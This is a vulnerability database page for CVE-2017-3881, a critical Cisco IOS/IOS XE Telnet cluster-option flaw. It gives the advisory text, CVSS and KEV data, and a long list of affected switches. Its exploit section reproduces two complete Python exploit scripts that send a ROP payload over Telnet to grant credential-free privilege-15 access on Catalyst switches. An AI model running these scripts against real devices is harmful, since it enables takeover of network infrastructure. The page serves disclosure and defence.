CVE-2017-3881 : Detail

CVE-2017-3881

9.8
/
Critical
A03-Injection
97.5%V3
Network
2017-03-17
21h00 +00:00
2024-11-15
18h00 +00:00
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CVE Descriptions

A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

[email protected]
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Cisco IOS and IOS XE Remote Code Execution Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2022-03-24 23h00 +00:00

Action is due : 2022-04-14 22h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 42122

Publication date : 2017-04-11 22h00 +00:00
Author : Artem Kondratenko
EDB Verified : No

#!/usr/bin/python # Author: # Artem Kondratenko (@artkond) import socket import sys from time import sleep set_credless = True if len(sys.argv) < 3: print sys.argv[0] + ' [host] --set/--unset' sys.exit() elif sys.argv[2] == '--unset': set_credless = False elif sys.argv[2] == '--set': pass else: print sys.argv[0] + ' [host] --set/--unset' sys.exit() s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 23)) print '[+] Connection OK' print '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) #sleep(0.5) print '[+] Sending cluster option' print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' payload = '\xff\xfa\x24\x00' payload += '\x03CISCO_KITS\x012:' payload += 'A' * 116 payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; #next bytes are shown as offsets from r1 payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34 if set_credless is True: payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1 else: payload += '\x00\x04\xea\x58' # unset payload += 'BBBB' # +16(+0) r1 points here at second gadget payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; payload += 'CCCC' # +8 payload += 'DDDD' # +12 payload += 'EEEE' # +16(+0) r1 points here at third gadget payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60 payload += 'FFFF' # +12 payload += 'GGGG' # +16(+0) r1 points here at fourth gadget payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; if set_credless: payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; else: payload += '\x00\x04\xe6\xf0' # unset payload += 'HHHH' # +12 payload += 'IIII' # +16(+0) r1 points here at fifth gadget payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; payload += 'JJJJ' # +8 r1 points here at third gadget payload += 'KKKK' # +12 payload += 'LLLL' # +16 payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr payload += ':15:' + '\xff\xf0' s.send(payload) print '[+] All done' s.close()
Exploit Database EDB-ID : 41872

Publication date : 2017-04-11 22h00 +00:00
Author : Artem Kondratenko
EDB Verified : No

#!/usr/bin/python # Exploit Title: Cisco Catalyst 2960 - Buffer Overflow # Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ # Date: 04.10.2017 # Exploit Author: https://twitter.com/artkond # Vendor Homepage: https://www.cisco.com/ # Version: IOS version c2960-lanbasek9-mz.122-55.SE11) # Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11 # CVE : CVE-2017-3881 # Description: # # The exploit connects to the Catalyst switch and patches # it execution flow to allow credless telnet interaction # with highest privilege level # import socket import sys from time import sleep set_credless = True if len(sys.argv) < 3: print sys.argv[0] + ' [host] --set/--unset' sys.exit() elif sys.argv[2] == '--unset': set_credless = False elif sys.argv[2] == '--set': pass else: print sys.argv[0] + ' [host] --set/--unset' sys.exit() s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 23)) print '[+] Connection OK' print '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) print '[+] Sending cluster option' print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' payload = '\xff\xfa\x24\x00' payload += '\x03CISCO_KITS\x012:' payload += 'A' * 116 payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; #next bytes are shown as offsets from r1 payload += '\x02\x3d\x55\xdc' # +8 address of pointer to is_cluster_mode function - 0x34 if set_credless is True: payload += '\x00\x00\x99\x9c' # +12 set address of func that rets 1 else: payload += '\x00\x04\xeA\xe0' # unset payload += 'BBBB' # +16(+0) r1 points here at second gadget payload += '\x00\xe1\xa9\xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; payload += 'CCCC' # +8 payload += 'DDDD' # +12 payload += 'EEEE' # +16(+0) r1 points here at third gadget payload += '\x00\x06\x7b\x5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; payload += '\x02\x3d\x55\xc8' # +8 r1+8 = 0x23d55c8 payload += 'FFFF' # +12 payload += 'GGGG' # +16(+0) r1 points here at fourth gadget payload += '\x00\x6c\xb3\xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; if set_credless: payload += '\x00\x27\x0b\x94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; else: payload += '\x00\x04\xe7\x78' # unset payload += 'HHHH' # +12 payload += 'IIII' # +16(+0) r1 points here at fifth gadget payload += '\x01\x4a\xcf\x98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; payload += 'JJJJ' # +8 r1 points here at third gadget payload += 'KKKK' # +12 payload += 'LLLL' # +16 payload += '\x01\x14\xe7\xec' # +20 original execution flow return addr payload += ':15:' + '\xff\xf0' s.send(payload) print '[+] All done' s.close()

Products Mentioned

Configuraton 0

Cisco>>Ios >> Version From (including) 12.2s To (including) 15.1\(3\)svs

Cisco>>Ios_xe >> Version From (including) 3.2sg To (including) 3.9e

Cisco>>Catalyst_2350-48td-s >> Version -

Cisco>>Catalyst_2350-48td-sd >> Version -

Cisco>>Catalyst_2360-48td-s >> Version -

Cisco>>Catalyst_2918-24tc-c >> Version -

Cisco>>Catalyst_2918-24tt-c >> Version -

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Cisco>>Catalyst_2928-24tc-c >> Version -

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Cisco>>Catalyst_3750e-24td-s >> Version -

Cisco>>Catalyst_3750e-48pd-e >> Version -

Cisco>>Catalyst_3750e-48pd-ef >> Version -

Cisco>>Catalyst_3750e-48pd-s >> Version -

Cisco>>Catalyst_3750e-48pd-sf >> Version -

Cisco>>Catalyst_3750e-48td-e >> Version -

Cisco>>Catalyst_3750e-48td-s >> Version -

Cisco>>Catalyst_3750g-12s >> Version -

Cisco>>Catalyst_3750g-12s-sd >> Version -

Cisco>>Catalyst_3750g-16td >> Version -

Cisco>>Catalyst_3750g-24ps >> Version -

Cisco>>Catalyst_3750g-24t >> Version -

Cisco>>Catalyst_3750g-24ts >> Version -

Cisco>>Catalyst_3750g-24ts-1u >> Version -

Cisco>>Catalyst_3750g-48ps >> Version -

Cisco>>Catalyst_3750g-48ts >> Version -

Cisco>>Catalyst_3750v2-24fs >> Version -

Cisco>>Catalyst_3750v2-24ps >> Version -

Cisco>>Catalyst_3750v2-24ts >> Version -

Cisco>>Catalyst_3750v2-48ps >> Version -

Cisco>>Catalyst_3750v2-48ts >> Version -

Cisco>>Catalyst_3750x-12s-e >> Version -

Cisco>>Catalyst_3750x-12s-s >> Version -

Cisco>>Catalyst_3750x-24p-e >> Version -

Cisco>>Catalyst_3750x-24p-l >> Version -

Cisco>>Catalyst_3750x-24p-s >> Version -

Cisco>>Catalyst_3750x-24s-e >> Version -

Cisco>>Catalyst_3750x-24s-s >> Version -

Cisco>>Catalyst_3750x-24t-e >> Version -

Cisco>>Catalyst_3750x-24t-l >> Version -

Cisco>>Catalyst_3750x-24t-s >> Version -

Cisco>>Catalyst_3750x-24u-e >> Version -

Cisco>>Catalyst_3750x-24u-l >> Version -

Cisco>>Catalyst_3750x-24u-s >> Version -

Cisco>>Catalyst_3750x-48p-e >> Version -

Cisco>>Catalyst_3750x-48p-l >> Version -

Cisco>>Catalyst_3750x-48p-s >> Version -

Cisco>>Catalyst_3750x-48pf-e >> Version -

Cisco>>Catalyst_3750x-48pf-l >> Version -

Cisco>>Catalyst_3750x-48pf-s >> Version -

Cisco>>Catalyst_3750x-48t-e >> Version -

Cisco>>Catalyst_3750x-48t-l >> Version -

Cisco>>Catalyst_3750x-48t-s >> Version -

Cisco>>Catalyst_3750x-48u-e >> Version -

Cisco>>Catalyst_3750x-48u-l >> Version -

Cisco>>Catalyst_3750x-48u-s >> Version -

Cisco>>Catalyst_4000_supervisor_engine_i >> Version -

Cisco>>Catalyst_4000_supervisor_engine_iv >> Version -

Cisco>>Catalyst_4000_supervisor_engine_v >> Version -

Cisco>>Catalyst_4500_supervisor_engine_6-e >> Version -

Cisco>>Catalyst_4500_supervisor_engine_6l-e >> Version -

Cisco>>Catalyst_4500_supervisor_engine_ii-plus >> Version -

Cisco>>Catalyst_4500_supervisor_engine_ii-plus-ts >> Version -

Cisco>>Catalyst_4500_supervisor_engine_iv >> Version -

Cisco>>Catalyst_4500_supervisor_engine_v >> Version -

Cisco>>Catalyst_4500_supervisor_engine_v-10ge >> Version -

Cisco>>Catalyst_4500_supervisor_ii-plus-10ge >> Version -

Cisco>>Catalyst_4500e_supervisor_engine_8-e >> Version -

Cisco>>Catalyst_4900m >> Version -

Cisco>>Catalyst_4928_10_gigabit_ethernet_switch >> Version -

Cisco>>Catalyst_4948 >> Version -

Cisco>>Catalyst_4948_10_gigabit_ethernet_switch >> Version -

Cisco>>Catalyst_4948e-f_ethernet_switch >> Version -

Cisco>>Catalyst_4948e_ethernet_switch >> Version -

Cisco>>Catalyst_blade_switch_3020 >> Version -

Cisco>>Catalyst_blade_switch_3030 >> Version -

Cisco>>Catalyst_blade_switch_3032 >> Version -

Cisco>>Catalyst_blade_switch_3040 >> Version -

Cisco>>Catalyst_blade_switch_3120 >> Version -

Cisco>>Catalyst_blade_switch_3120x >> Version -

Cisco>>Catalyst_blade_switch_3130 >> Version -

Cisco>>Catalyst_c2928-24lt-c >> Version -

Cisco>>Catalyst_c2928-48tc-c >> Version -

Cisco>>Catalyst_switch_module_3012 >> Version -

Cisco>>Catalyst_switch_module_3110 >> Version -

Cisco>>Catalyst_switch_module_3110x >> Version -

Cisco>>Embedded_service_2020_24tc_con >> Version -

Cisco>>Embedded_service_2020_24tc_con_b >> Version -

Cisco>>Embedded_service_2020_24tc_ncp >> Version -

Cisco>>Embedded_service_2020_24tc_ncp_b >> Version -

Cisco>>Embedded_service_2020_con >> Version -

Cisco>>Embedded_service_2020_con_b >> Version -

Cisco>>Embedded_service_2020_ncp >> Version -

Cisco>>Embedded_service_2020_ncp_b >> Version -

Cisco>>Enhanced_layer_2\/3_etherswitch_service_module >> Version -

Cisco>>Enhanced_layer_2_etherswitch_service_module >> Version -

Cisco>>Gigabit_ethernet_switch_module_\(cgesm\) >> Version -

Cisco>>Ie-3010-16s-8pc_industrial_ethernet_switch >> Version -

Cisco>>Ie-3010-24tc_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-16gt4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-16t4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-4gc4gp4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-4gs8gp4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-4s8p4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-4t4p4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-4tc4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-8gs4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-8gt4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-8gt8gp4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-8s4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4000-8t4g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie-4010-16s12p_industrial_ethernet_switch >> Version -

Cisco>>Ie-4010-4s24p_industrial_ethernet_switch >> Version -

Cisco>>Ie-5000-12s12p-10g_industrial_ethernet_switch >> Version -

Cisco>>Ie-5000-16s12p_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16ptc-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16t67_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16t67p_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16tc-g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16tc-g-n_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16tc-g-x_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16tc-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-16tc_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-24t67_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-4s-ts-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-4t-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-4t_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-4ts-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-4ts_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8t67_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8t67p_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8tc-g-e_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8tc-g-n_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8tc-g_industrial_ethernet_switch >> Version -

Cisco>>Ie_2000-8tc_industrial_ethernet_switch >> Version -

Cisco>>Ie_3000-4tc_industrial_ethernet_switch >> Version -

Cisco>>Ie_3000-8tc_industrial_ethernet_switch >> Version -

Cisco>>Me_4924-10ge >> Version -

Cisco>>Rf_gateway_10 >> Version -

Cisco>>Sm-x_layer_2\/3_etherswitch_service_module >> Version -

References

https://www.exploit-db.com/exploits/41872/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/41874/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/97391
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/bid/96960
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1038059
Tags : vdb-entry, x_refsource_SECTRACK